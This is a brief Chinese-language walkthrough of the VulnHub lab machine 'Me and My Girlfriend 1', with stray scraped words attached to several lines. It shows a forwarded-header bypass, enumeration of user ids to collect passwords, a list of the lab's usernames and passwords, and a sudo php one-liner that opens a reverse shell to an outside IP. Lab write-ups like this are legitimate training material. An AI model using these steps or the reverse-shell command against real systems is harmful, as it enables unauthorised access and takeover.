靶機連接:php
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/web
主機掃描:ssh
HTTP 目錄訪問,提示無權限,右鍵源碼,提示XXF便可3d
正常訪問,註冊一個用戶,登陸,而後查看用戶profile,經過id進行遍歷枚舉用戶密碼blog
eweuhtandingan skuyatuh
sedihaingmah cedihhihihi
aingmaung qwerty!!!
abdikasepak dorrrrr
sundatea indONEsia
alice 4lic3
pentest pentest源碼
經過注意登陸web,無發現上傳的點test
而後經過ssh嘗試登陸登錄
提權操做sed
sudo /usr/bin/php -r '$sock=fsockopen("10.10.203.14",1234);exec("/bin/sh -i <&3 >&3 2>&3");'date
OVER !!